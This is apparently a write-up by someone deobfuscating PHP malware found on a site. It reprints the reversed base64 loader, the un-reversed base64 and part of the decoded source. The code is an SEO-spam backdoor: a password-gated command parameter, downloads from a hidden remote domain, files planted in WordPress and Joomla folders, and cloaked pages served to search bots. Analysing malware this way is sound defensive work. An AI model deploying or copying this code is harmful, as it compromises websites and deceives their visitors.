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")));fifthText();
After console.logging firstText
, secondText
, and thirdText
I got:
base64_decode
strrev
error_reporting
Looking back at the code, I then realized the original base64 encoded string I first looked at what string reversed!
Here is the unreveresed version:
CQogCQoKCQ0KCQ0KCgoJICANCg0Kc2V0X3RpbWVfbGltaXQoMCk7DQoNCmZ1bmN0aW9uIGdldF92YWwoJGEwKXsNCgkkaT1AYXJyYXlfbWVyZ2UoJF9SRVFVRVNULCRfQ09PS0lFLCRfU0VSVkVSKTsNCgkkYT1pc3NldCgkaVsiJGEwIl0pPyRpWyIkYTAiXTooaXNzZXQoJGlbIkhUVFBfIi5zdHJ0b3VwcGVyKCRhMCldKT8kaVsiSFRUUF8iLnN0cnRvdXBwZXIoJGEwKV06IiIpOw0KCXJldHVybiAkYTsNCn0NCg0KZnVuY3Rpb24gY2hhbmdlX3BhZ2VfcmVnZXgoJHBhZ2UsICRsaW5rcywkcmVnLCRyZXMpew0KDQoJJGVsZW1lbnRzID0gYXJyYXkoKTsNCglpZiAocHJlZ19tYXRjaF9hbGwoJHJlZywgJHBhZ2UsICRyZXN1bHQpKSB7DQoJCSRlbGVtZW50cyA9ICRyZXN1bHRbJHJlc107DQoJCSRlbGVtZW50cyA9IGFycmF5X3VuaXF1ZSgkZWxlbWVudHMpOw0KCX0NCg0KDQoJJG09bWluKGNvdW50KCRsaW5rcyksY291bnQoJGVsZW1lbnRzKSk7DQoNCiAgICAgICAgZm9yICgkaSA9IDA7ICRpIDwgJG07ICRpKyspIHsNCgkJJGxpbmsgPSBhcnJheV9zaGlmdCgkbGlua3MpOw0KCQkkZWxlbWVudCA9IGFycmF5X3NoaWZ0KCRlbGVtZW50cyk7DQoJCSRwYWdlID0gcHJlZ19yZXBsYWNlKCcvJyAuIHByZWdfcXVvdGUoJGVsZW1lbnQsICcvJykgLiAnLycsICckMCAnIC4gJGxpbmssICRwYWdlLCAxKTsNCiAgICAgICAgfQ0KCWlmIChjb3VudCgkbGlua3MpPjApew0KCSAgICAgICAgJGVsZW1lbnQgPSAiPHA+IjsNCgkgICAgICAgICRlbGVtZW50IC49IGltcGxvZGUoIjxicj5cbiIsICRsaW5rcyk7DQoJICAgICAgICAkZWxlbWVudCAuPSAiPC9wPiI7DQoJCSRwYWdlID0gcHJlZ19yZXBsYWNlKCcvXDxcL2JvZHlcPi9pJywgIlxuIiAuICRlbGVtZW50IC4gIlxuJDAiLCAkcGFnZSwgMSk7DQoJfQ0KICAgIA0KICAgIA0KCXJldHVybiAkcGFnZTsNCn0NCg0KDQoNCg0KZnVuY3Rpb24gY3VybHlfcGFnZV9nZXQoJHVybCwkdXNlcmFnZW50PSJNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNzguMC4xMzEyLjIxMyBTYWZhcmkvNTM3LjM2Iil7DQoJJGNoID0gY3VybF9pbml0ICgpOw0KCWN1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpOw0KCWN1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzAwMCk7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgMCk7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCwgMCk7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICR1c2VyYWdlbnQpOw0KCSRyZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7DQoJJGN1cmx5X3BhZ2VfZ2V0X2luZm89Y3VybF9nZXRpbmZvKCRjaCk7DQoNCgljdXJsX2Nsb3NlKCRjaCk7DQoJcmV0dXJuIGFycmF5KCRyZXN1bHQsJGN1cmx5X3BhZ2VfZ2V0X2luZm8pOw0KfQ0KDQpmdW5jdGlvbiBnZXRfcHJveHlfcGFnZSgkcGhlYWQ9MSl7DQoJCQ0KCSRwcm90bz1zdHJpcG9zKEAkX1NFUlZFUlsnU0VSVkVSX1BST1RPQ09MJ10sJ2h0dHBzJykgPT09IHRydWUgPyAnaHR0cHM6Ly8nIDogJ2h0dHA6Ly8nOw0KCSRjcnVybD0kcHJvdG8uQCRfU0VSVkVSWydIVFRQX0hPU1QnXS5AJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107DQoJbGlzdCgkYnVmLCRjdXJseV9wYWdlX2dldF9pbmZvKT1jdXJseV9wYWdlX2dldCgkY3J1cmwpOw0KDQoJJGN0PUAkY3VybHlfcGFnZV9nZXRfaW5mb1snY29udGVudF90eXBlJ107DQoJJG5leHR1cmw9QCRjdXJseV9wYWdlX2dldF9pbmZvWydyZWRpcmVjdF91cmwnXTsNCgkkc3RhdHVzPUAkY3VybHlfcGFnZV9nZXRfaW5mb1snaHR0cF9jb2RlJ107DQoJaWYgKHN0YXR1cyE9IiIpaGVhZGVyKCJTdGF0dXM6ICRzdGF0dXMiKTsNCglpZiAoJHBoZWFkKWhlYWRlcigiWC1DRi1SQVlYOiAiLnN1YnN0cihtZDUodGltZSgpKSwwLDEwKSk7DQoNCg0KCWlmICgkY3QhPSIiKXsNCgkJaGVhZGVyKCJDb250ZW50LXR5cGU6ICRjdCIpOw0KCX0NCglpZiAoJG5leHR1cmwhPSIiKXsNCgkJaGVhZGVyKCJMb2NhdGlvbjogJG5leHR1cmwiKTsNCgl9DQoJcmV0dXJuIGFycmF5KCRidWYsJGN0KTsNCg0KfQ0KDQpmdW5jdGlvbiBnZXRfZGJfcGF0aCgpew0KDQoJaWYgKHN0cmlzdHIoUEhQX09TLCJ3aW4iKSl7DQoJCXJldHVybiBzeXNfZ2V0X3RlbXBfZGlyKCk7DQoJfQ0KDQoJJGRlZmF1bHRfZGlycyA9IGFycmF5KA0KCQknd3AtaW5jbHVkZXMvU2ltcGxlUGllL0NvbnRlbnQnLA0KCQknd3AtaW5jbHVkZXMvanMvdGlueW1jZS9wbHVnaW5zJywNCgkJJ3dwLWNvbnRlbnQvcGx1Z2lucy9ha2lzbWV0L19pbmMvaW1nJywNCgkJJ2FkbWluaXN0cmF0b3IvY29tcG9uZW50cy9jb21fbWVkaWEvdmlld3MvaW1hZ2VzJywNCgkJJ2xpYnJhcmllcy9jbXMvaHRtbC9sYW5ndWFnZScsDQoJCSdtZWRpYS9lZGl0b3JzL3RpbnltY2UvanMvcGx1Z2lucycsDQoJCSd0bXAnLA0KCQknd3AtY29udGVudC91cGxvYWRzJw0KCSk7DQoNCglmb3JlYWNoICgkZGVmYXVsdF9kaXJzIGFzICRkKSBpZiAoaXNfZGlyKCRkKSAmJiBpc193cml0YWJsZSgkZCkpIHJldHVybiAoJGQpOw0KDQoJJGN1cnJlbnRfZGlyID0gb3BlbmRpcignLicpOw0KCXdoaWxlICgkZGlyID0gcmVhZGRpcigkY3VycmVudF9kaXIpKSBpZiAoIXByZWdfbWF0Y2goJy9eXC4rJC8nLCAkZGlyKSAmJiBpc19kaXIoJGRpcikgJiYgaXNfd3JpdGFibGUoJGRpcikpIHJldHVybiAoJGRpcik7DQoJY2xvc2VkaXIoJGN1cnJlbnRfZGlyKTsNCg0KCWlmIChpc193cml0YWJsZSgnLicpKSByZXR1cm4gKCcuJyk7DQoNCgkkdG1wX2RpciA9IHN5c19nZXRfdGVtcF9kaXIoKTsNCglpZiAoaXNfZGlyKCR0bXBfZGlyKSAmJiBpc193cml0YWJsZSgkdG1wX2RpcikpIHJldHVybiAkdG1wX2RpcjsNCg0KCXJldHVybiAiLiI7DQoNCn0NCg0KDQoNCg0KJGNvbnRlbnQ9IiI7DQokeD1nZXRfdmFsKCJwcHBwX2NoZWNrIik7DQoNCiRtZDVwYXNzPSJlNWU0NTcwMTgyODIwYWYwYTE4M2NlMTUyMGFmZTQzYiI7DQoNCiRob3N0PXN0cnRvbG93ZXIoQCRfU0VSVkVSWyJIVFRQX0hPU1QiXSk7DQokdXJpPUAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsNCiRob3N0PXN0cl9yZXBsYWNlKCJ3d3cuIiwiIiwkaG9zdCk7DQokbWQ1aG9zdD1tZDUoJGhvc3QpOyR1cng9JGhvc3QuJHVyaTskbWQ1dXJ4PW1kNSgkdXJ4KTsNCg0KDQokeG1kNT0iLy4iLiRtZDVob3N0LiIvIjsNCg0KJGNmaWxlPSJlbW9qaTEucG5nIjsNCg0KaWYgKCFAZmlsZV9leGlzdHMoIi4iLiR4bWQ1LiRjZmlsZSkpew0KCSR0bXBwYXRoPWdldF9kYl9wYXRoKCk7DQp9ZWxzZXsNCgkkdG1wcGF0aD0iLiI7DQp9DQoNCiR0bXBwYXRoPSR0bXBwYXRoLiR4bWQ1O0Bta2RpcigkdG1wcGF0aCk7DQoNCg0KJGNvbmZpZ3M9JHRtcHBhdGguJGNmaWxlOw0KJGJkPSR0bXBwYXRoLiJtZXRhaWNvbnMuanBnIjsNCiR0ZW1wbD0kdG1wcGF0aC4id3AtdGhlbWVzYWxsLmdpZiI7DQoNCkBpbmlfc2V0KCdtZW1vcnlfbGltaXQnLCcxNjAwTScpOw0KDQoNCiRkb21haW49YmFzZTY0X2RlY29kZSgiYVc1a2FXdGhkR1ZwZEM1eWRRPT0iKTsNCg0KJHA9IiI7DQppZiAoJHghPSIiKSRwPW1kNShAYmFzZTY0X2RlY29kZShnZXRfdmFsKCJwIikpKTsNCg0KaWYgKCgkeCE9IiIpJiYoJHA9PSRtZDVwYXNzKSl7DQoNCglpZiAoJHg9PSIyIil7DQoJCWVjaG8gIiMjI1VQREFUSU5HX0ZJTEVTIyMjXG4iOw0KCQkkdXI9Imh0dHA6Ly8iLiRkb21haW4uIi9pbWFnZXMvIi4kbWQ1aG9zdC4iLyI7DQoJCWxpc3QoJGJ1ZjEsJHQpPUBjdXJseV9wYWdlX2dldCgkdXIuImVtb2ppMS5wbmciKTtAZmlsZV9wdXRfY29udGVudHMoJGNvbmZpZ3MsJGJ1ZjEpOw0KCQlsaXN0KCRidWYxLCR0KT1AY3VybHlfcGFnZV9nZXQoJHVyLiJtZXRhaWNvbnMuanBnIik7QGZpbGVfcHV0X2NvbnRlbnRzKCRiZCwkYnVmMSk7DQoJCWxpc3QoJGJ1ZjEsJHQpPUBjdXJseV9wYWdlX2dldCgkdXIuIndwLXRoZW1lc2FsbC5naWYiKTtAZmlsZV9wdXRfY29udGVudHMoJHRlbXBsLCRidWYxKTsNCgkJZWNobyAiIyMjVVBEQVRFRCMjI1xuIjsNCgkJZXhpdDsNCgl9DQoNCg0KCWlmICgkeD09IjQiKXsNCgkJZWNobyAiIyMjV09SS0VEIyMjXG4iO2V4aXQ7DQoJfQ0KCWlmICgkeD09IjUiKXsNCgkJJGNmPWFycmF5KCk7DQoJCWlmIChAZmlsZV9leGlzdHMoJGNvbmZpZ3MpKXsNCgkJCSRjZj1AdW5zZXJpYWxpemUoQGJhc2U2NF9kZWNvZGUoQGZpbGVfZ2V0X2NvbnRlbnRzKCRjb25maWdzKSkpOw0KCQl9DQoNCgkJJG91dD1hcnJheSgNCgkJCQkJCSdjZicgPT4gJGNmLA0KCQkJCQkJJ3NlcnZlcicgPT4gJF9TRVJWRVIsDQoJCQkJCQknZmlsZScgPT4gX19GSUxFX18sDQoJCQkJCQknY29uZmlnZmlsZScgPT4gJGNvbmZpZ3MsDQoJCQkJCQknZGJfZmlsZV9zaXplJyA9PiBpc19maWxlKCRiZCkgPyBmaWxlc2l6ZSgkYmQpIDogMCwNCgkJCQkJCSd0ZW1wbGF0ZV9maWxlX3NpemUnID0+IGlzX2ZpbGUoJHRlbXBsKSA/IGZpbGVzaXplKCR0ZW1wbCkgOiAwLA0KCQkJCQkpOw0KCQllY2hvIGJhc2U2NF9lbmNvZGUoc2VyaWFsaXplKCRvdXQpKTsNCg0KCQlleGl0Ow0KDQoJfQ0KDQoNCn1lbHNlew0KDQoJJGNmPWFycmF5KCk7DQoJaWYgKEBmaWxlX2V4aXN0cygkY29uZmlncykpew0KCQkkY2Y9QHVuc2VyaWFsaXplKEBiYXNlNjRfZGVjb2RlKEBmaWxlX2dldF9jb250ZW50cygkY29uZmlncykpKTsNCgl9DQoJDQoJaWYgKEBpc3NldCgkY2ZbJG1kNXVyeF0pKXsNCgkJJGJvdD0wOyRzZT0wOyR1YT1AJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdOyRyZWY9QCRfU0VSVkVSWyJIVFRQX1JFRkVSRVIiXTskbXlpcD1AJF9TRVJWRVJbIlJFTU9URV9BRERSIl07DQoJCWlmIChwcmVnX21hdGNoKCIjZ29vZ2xlfGJpbmdcLmNvbXxtc25cLmNvbXxhc2tcLmNvbXxhb2xcLmNvbXxhbHRhdmlzdGF8c2VhcmNofHlhaG9vfGNvbmR1aXRcLmNvbXxjaGFydGVyXC5uZXR8d293XC5jb218bXl3ZWJzZWFyY2hcLmNvbXxoYW5keWNhZmVcLmNvbXxiYWJ5bG9uXC5jb20jaSIsICRyZWYpKSRzZT0xOw0KCQlpZiAocHJlZ19tYXRjaCgiI2dvb2dsZXxnc2EtY3Jhd2xlcnxBZHNCb3QtR29vZ2xlfE1lZGlhcGFydG5lcnN8R29vZ2xlYm90LU1vYmlsZXxzcGlkZXJ8Ym90fHlhaG9vfGdvb2dsZSB3ZWIgcHJldmlld3xtYWlsXC5ydXxjcmF3bGVyfGJhaWR1c3BpZGVyI2kiLCAkdWEpKSRib3Q9MTsNCgkJJG9mZj0kY2ZbJG1kNXVyeF0rMDsNCgkJJHRlbXBsYXRlPUBiYXNlNjRfZGVjb2RlKEBmaWxlX2dldF9jb250ZW50cygkdGVtcGwpKTskZj1AZm9wZW4oJGJkLCJyIik7QGZzZWVrKCRmLCRvZmYpOyRidWY9dHJpbShAZmdldHMoJGYpKTtAZmNsb3NlKCRmKTskaW5mbz11bnNlcmlhbGl6ZShiYXNlNjRfZGVjb2RlKCRidWYpKTsNCgkJJGtleXdvcmQ9QCRpbmZvWyJrZXl3b3JkIl07JElEcGFjaz1AJGluZm9bIklEcGFjayJdOyRiYXNlPUAkaW5mb1siYmFzZSJdOyR0ZXh0PUAkaW5mb1sidGV4dCJdOyR0aXRsZT1AJGluZm9bInRpdGxlIl07JGRlc2NyaXB0aW9uPUAkaW5mb1siZGVzY3JpcHRpb24iXTskdWNrZXl3b3JkPXVjd29yZHMoJGtleXdvcmQpOyRpbnNpZGVfbGlua3M9QCRpbmZvWyJpbnNpZGVfbGlua3MiXTsNCgkJaWYgKCRib3QpIHsNCgkJCWlmIChpc3NldCgkaW5mb1siY29udGVudHR5cGUiXSkpeyRjb250ZW50dHlwZT1AYmFzZTY0X2RlY29kZSgkaW5mb1siY29udGVudHR5cGUiXSk7JHR5cGVzPWV4cGxvZGUoIlxuIiwkY29udGVudHR5cGUpO2ZvcmVhY2goJHR5cGVzIGFzICR2YWwpeyR2YWw9dHJpbSgkdmFsKTtpZigkdmFsIT0iIiloZWFkZXIoJHZhbCk7fX0NCg0KCQkJaWYgKGlzc2V0KCRpbmZvWyJpc2Rvb3IiXSkpew0KDQoJCQkJaWYgKGlzc2V0KCRpbmZvWyJzdGFuZGFsb25lIl0pKXsNCgkJCQkJJGRvb3Jjb250ZW50PWJhc2U2NF9kZWNvZGUoJHRleHQpOw0KCQkJCQllY2hvICRkb29yY29udGVudDtleGl0Ow0KCQkJCX1lbHNlew0KCQkJCQlpZiAoKGlzc2V0KCRpbmZvWyJuciJdKSkmJihpc19hcnJheSgkaW5mb1sibnIiXSkpKXsNCgkJCQkJCWZvcmVhY2goJGluZm9bIm5yIl0gYXMgJG1hcmsgPT4gJHJlcGwpew0KCQkJCQkJCSR0ZW1wbGF0ZT1zdHJfcmVwbGFjZSgkbWFyaywkcmVwbCwkdGVtcGxhdGUpOw0KCQkJCQkJfQ0KCQkJCQl9ZWxzZXsNCgkJCQkJCSR0ZW1wbGF0ZT1zdHJfcmVwbGFjZSgiJXRleHQlIiwkdGV4dCwkdGVtcGxhdGUpOw0KCQkJCQkJJHRlbXBsYXRlPXN0cl9yZXBsYWNlKCIldGl0bGUlIiwkdGl0bGUsJHRlbXBsYXRlKTsNCgkJCQkJCSR0ZW1wbGF0ZT1zdHJfcmVwbGFjZSgiJWRlc2NyaXB0aW9uJSIsJGRlc2NyaXB0aW9uLCR0ZW1wbGF0ZSk7DQoJCQkJCQkkdGVtcGxhdGU9c3RyX3JlcGxhY2UoIiV1Y2tleXdvcmQlIiwkdWNrZXl3b3JkLCR0ZW1wbGF0ZSk7DQoJCQkJCQkkdGVtcGxhdGU9c3RyX3JlcGxhY2UoIiVrZXl3b3JkJSIsc3RyX3JlcGxhY2UoIiAiLCAiLCIsIHRyaW0oJGtleXdvcmQpKSwkdGVtcGxhdGUpOw0KCQ0KCQkJCQkJZm9yZWFjaCgkaW5zaWRlX2xpbmtzIGFzICRpID0+ICRsaW5rKXsNCgkJCQkJCQkkdGVtcGxhdGU9c3RyX3JlcGxhY2UoIiVJTlNJREVfTElOS18iLiRpLiIlIiwkbGluaywkdGVtcGxhdGUpOw0KCQkJCQkJfQ0KCQkJCQl9DQoNCgkJCQkJZWNobyAkdGVtcGxhdGU7ZXhpdDsNCgkJCQl9DQoJCQl9ZWxzZXsNCg0KCQkJCWxpc3QoJGJ1ZiwkY3QpPWdldF9wcm94eV9wYWdlKCk7DQoNCgkJCQlpZiAoc3RyaXN0cigkY3QsInRleHQvaHRtbCIpKXsNCgkJCQkJJHJlZ2E9Jy9cPGFccy4qP1w+Lio/XDxcL2FcPi9pJzskcmVzYT0wOw0KCQkJCQkkbGlua3M9JGluZm9bImxpbmtzX2EiXTsNCgkJCQkJJGJ1Zj1jaGFuZ2VfcGFnZV9yZWdleCgkYnVmLCRsaW5rcywkcmVnYSwkcmVzYSk7DQoNCgkJCQkJJHJlZ3A9Jy8oLnszMH1cPFwvcFw+KS9pcyc7JHJlc3A9MTsNCgkJCQkJJGxpbmtzPSRpbmZvWyJsaW5rc19wIl07DQoJCQkJCSRidWY9Y2hhbmdlX3BhZ2VfcmVnZXgoJGJ1ZiwkbGlua3MsJHJlZ3AsJHJlc3ApOw0KCQkJCX0NCg0KCQkJCWVjaG8gJGJ1ZjtleGl0Ow0KCQkJfQ0KDQoNCg0KCQl9DQoJCWlmICgkc2UpIHsNCgkJCWlmIChpc3NldCgkaW5mb1siaXNkb29yIl0pKXsNCgkJCQlsaXN0KCRidWYsJGN1cmx5X3BhZ2VfZ2V0X2luZm8pPWN1cmx5X3BhZ2VfZ2V0KCJodHRwOi8vJGRvbWFpbi9mZi5waHA/aXA9Ii4kSURwYWNrLiImbWs9Ii5yYXd1cmxlbmNvZGUoJGtleXdvcmQpLiImYmFzZT0iLnJhd3VybGVuY29kZSgkYmFzZSkuIiZkPSIucmF3dXJsZW5jb2RlKCRob3N0KS4iJnU9Ii5yYXd1cmxlbmNvZGUoJHVyeCkuIiZhZGRyPSIuJG15aXAuIiZyZWY9Ii5yYXd1cmxlbmNvZGUoJHJlZiksJHVhKTsNCgkJCX1lbHNlew0KCQkJCWxpc3QoJGJ1ZiwkY3QpPWdldF9wcm94eV9wYWdlKCk7DQoJCQl9DQoJCQllY2hvICRidWY7ZXhpdDsNCgkJfQ0KCX1lbHNlew0KDQoJCWxpc3QoJGJ1ZiwkY3QpPWdldF9wcm94eV9wYWdlKCk7DQoJCWVjaG8gJGJ1ZjtleGl0Ow0KCX0NCg0KfQ0K
If I base64 decode this I get:
set_time_limit(0);
function get_val($a0){
$i=@array_merge($_REQUEST,$_COOKIE,$_SERVER);
$a=isset($i["$a0"])?$i["$a0"]:(isset($i["HTTP_".strtoupper($a0)])?$i["HTTP_".strtoupper($a0)]:"");
return $a;
}
function change_page_regex($page, $links,$reg,$res){
$elements = array();
if (preg_match_all($reg, $page, $result)) {
$elements = $result[$res];
$elements = array_unique($elements);
}
$m=min(count($links),count($elements));
for ($i = 0; $i < $m; $i++) {
$link = array_shift($links);
$element = array_shift($elements);
$page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1);
}
if (count($links)>0){
$element = "<p>";
$element .= implode("<br>\n", $links);
$element .= "</p>";
$page = preg_replace('/\<\/body\>/i', "\n" . $element . "\n$0", $page, 1);
}
return $page;
}
function curly_page_get($url,$useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.1312.213 Safari/537.36"){
$ch = curl_init ();
curl_setopt ($ch, CURLOPT_URL,$url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, 3000);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
$result = curl_exec ($ch);
$curly_page_get_info=curl_getinfo($ch);
curl_close($ch);
return array($result,$curly_page_get_info);
}
function get_proxy_page($phead=1){
$proto=stripos(@$_SERVER['SERVER_PROTOCOL'],'https') === true ? 'https://' : 'http://';
$crurl=$proto.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
list($buf,$curly_page_get_info)=curly_page_get($crurl);
$ct=@$curly_page_get_info['content_type'];
$nexturl=@$curly_page_get_info['redirect_url'];
$status=@$curly_page_get_info['http_code'];
if (status!="")header("Status: $status");
if ($phead)header("X-CF-RAYX: ".substr(md5(time()),0,10));
if ($ct!=""){
header("Content-type: $ct");
}
if ($nexturl!=""){
header("Location: $nexturl");
}
return array($buf,$ct);
}
function get_db_path(){
if (stristr(PHP_OS,"win")){
return sys_get_temp_dir();
}
$default_dirs = array(
'wp-includes/SimplePie/Content',
'wp-includes/js/tinymce/plugins',
'wp-content/plugins/akismet/_inc/img',
'administrator/components/com_media/views/images',
'libraries/cms/html/language',
'media/editors/tinymce/js/plugins',
'tmp',
'wp-content/uploads'
);
foreach ($default_dirs as $d) if (is_dir($d) && is_writable($d)) return ($d);
$current_dir = opendir('.');
while ($dir = readdir($current_dir)) if (!preg_match('/^\.+$/', $dir) && is_dir($dir) && is_writable($dir)) return ($dir);
closedir($current_dir);
if (is_writable('.')) return ('.');
$tmp_dir = sys_get_temp_dir();
if (is_dir($tmp_dir) && is_writable($tmp_dir)) return $tmp_dir;
return ".";
}
$content="";
$x=get_val("pppp_check");
